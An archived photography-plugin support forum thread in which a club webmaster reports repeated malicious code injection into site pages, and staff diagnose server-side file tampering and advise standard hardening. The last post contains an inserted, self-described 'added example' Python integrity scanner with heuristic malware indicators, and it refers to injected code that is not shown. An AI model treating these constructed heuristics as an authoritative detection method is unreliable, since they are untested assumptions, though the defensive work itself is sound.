Community @ The Turning Gate

Support community for TTG plugins and products.

NOTICE

The Turning Gate's Community has moved to a new home, at https://discourse.theturninggate.net.

This forum is now closed, and exists here as a read-only archive.

  • New user registrations are disabled.
  • Users cannot create new topics.
  • Users cannot reply to existing topics.


#1 2013-04-14 11:42:59

ksseelye
Member
Registered: 2012-11-28
Posts: 7

Cross-Site Scripting (Stop the Madness.... Please)

Hi guys, I have been chosen to handle our local photography club's website. I love all the plugins that TTG has available and have purchased what I think is all of them except the shopping cart. I created the site about 6 months ago and shortly after publishing the site I was notified by Google that my site was infected. I searched the code on the site and found almost every index.php and html page was infected with suspicious code. I cleaned the site and a few days later it was back. I have implemented key captcha on all the registration forms for the blog and forum. I have implemented site scan from Go Daddy and they keep informing me that my vulnerability is Cross-site scripting. After some research I found this is exactly what is happening to my site. Malicious code is being injected into all my pages, which oftentimes gets flagged by Google, or personal virus protections on members' computers are alerting them of a malicious site and blocking it. My question, or at this stage of the game my plea for help, is what can be done with the plugins to shut down this vulnerability with a site that was built on TTG plugins. I have no hair left due to trying to stop this from happening. My current plugins include CE2 & CE3 Pages, CE2 & CE3 Auto Index, CE2 & CE3 Client Response Gallery, CE3 Publisher, CE2 Stage, and CE2 Theme for WordPress. Please stop the Madness, I am spending way too much time uploading clean code. Thank you in advance.


#2 2013-04-14 16:36:52

Matthew
Administrator
From: San Francisco, CA
Registered: 2012-09-24
Posts: 5,795
Website

Re: Cross-Site Scripting (Stop the Madness.... Please)

You're not giving us much to go on here. What "suspicious code"?

And you should take the standard security measures: change your cPanel and FTP passwords, restrict permissions on site folders and files except where necessary (for example, Publisher requires more open permissions), implement a robots.txt file, take a look at your .htaccess file if you have one, etc. If you don't have a .htaccess file, you may want to create one. Here are some guidelines:
https://github.com/h5bp/server-configs/ … /README.md

You might also try implementing a crossdomain policy:
https://github.com/h5bp/html5-boilerpla … sdomain.md


Matt

The Turning Gate, http://theturninggate.net


#3 2013-04-14 17:17:59

Matthew
Administrator
From: San Francisco, CA
Registered: 2012-09-24
Posts: 5,795
Website

Re: Cross-Site Scripting (Stop the Madness.... Please)

Here's another good article on .htaccess setup
http://net.tutsplus.com/tutorials/other … ess-files/


Matt

The Turning Gate, http://theturninggate.net


#4 2013-04-14 22:03:55

ksseelye
Member
Registered: 2012-11-28
Posts: 7

Re: Cross-Site Scripting (Stop the Madness.... Please)

I do have a .htaccess file and it usually is unchanged when the code is injected, so I am thinking that it is unrelated to the injections. But I may be wrong. Below you will see the code that is injected into almost every index.php page and html page. The template.php files are also infected, which I believe are used to propagate the code to all the pages. Any help you can provide would be greatly appreciated.



#5 2013-04-14 22:07:57

ksseelye
Member
Registered: 2012-11-28
Posts: 7

Re: Cross-Site Scripting (Stop the Madness.... Please)

The current site is antietamphotographicsociety.org in case you want to take a look.


#6 2013-04-16 01:44:51

Matthew
Administrator
From: San Francisco, CA
Registered: 2012-09-24
Posts: 5,795
Website

Re: Cross-Site Scripting (Stop the Madness.... Please)

Pages created by TTG plugins are no less and no more secure than any other web pages. If your site is being hacked, then you need to take the appropriate security measures on your server, as I have already suggested. Change your access credentials (logins/passwords), lock down permissions wherever possible, utilize .htaccess, robots.txt and crossdomain.xml files to set access policies and block bots, etc. Your host should be able to help you at least to some extent in this. The problem is not the galleries; the problem is that your pages are being accessed and rewritten on the server.


Matt

The Turning Gate, http://theturninggate.net


#7 2013-04-16 07:29:55

Ben
Moderator
From: Melbourne, Australia
Registered: 2012-09-29
Posts: 4,399

Re: Cross-Site Scripting (Stop the Madness.... Please)

This isn't an example of XSS. Somebody has been able to make changes to the PHP files in your hosting account.

The most common way this is done is by exploiting vulnerabilities in WordPress, either in an installation in your own account, or on another account hosted on the same server. Whatever the case, this is a serious breach of security. I would pursue GoDaddy further on this, as it should be of considerable concern to GoDaddy and their customers (yourself!).

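The diagnosis in this thread is that files on the server are being rewritten, not that visitors are triggering a cross-site scripting bug in the pages, so the useful check is file integrity: hash everything under the web root once while it is known clean, then re-scan after each cleanup to see exactly which index.php, html and template.php files changed or appeared. The script below is an added example written for this thread, not TTG or GoDaddy code; the web root path and the content indicators (eval, char-code decoding, numbered wrapper markers) are assumptions chosen to catch obfuscated script stubs of the kind pasted above, not a vendor signature set.

```python
# Added example (not TTG code): hash every file under a known-clean web root,
# then re-scan to report changed/new/missing files and flag script stubs.
# The indicator patterns are a constructed heuristic, not a signature database.
import hashlib
import os
import re

# Indicators of an obfuscated script stub: eval, char-code decoding and
# numbered wrapper markers. Tune per site; assumption, not a vendor rule.
SUSPECT_PATTERNS = [
    re.compile(rb"\beval\b", re.I),
    re.compile(rb"fromCharCode", re.I),
    re.compile(rb"#\d{5,}#"),
]
SCAN_EXT = (".php", ".html", ".htm", ".js")

def file_sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(root):
    """Map of path (relative to root) -> sha256 for every file under root."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, root)] = file_sha256(full)
    return baseline

def scan(root, baseline):
    """Return (changed, added, removed, suspicious) versus the baseline;
    suspicious lists (path, hit_patterns) for files with >= 2 indicators."""
    current = build_baseline(root)
    changed = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    suspicious = []
    for rel in sorted(current):
        if not rel.endswith(SCAN_EXT):
            continue
        with open(os.path.join(root, rel), "rb") as f:
            data = f.read()
        hits = [p.pattern.decode() for p in SUSPECT_PATTERNS if p.search(data)]
        if len(hits) >= 2:  # require two indicators to limit false positives
            suspicious.append((rel, hits))
    return changed, added, removed, suspicious
```

Keep the saved baseline (for example as JSON) somewhere the web server account cannot write, since whoever can rewrite index.php can rewrite a baseline stored beside it.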

Board footer

Powered by FluxBB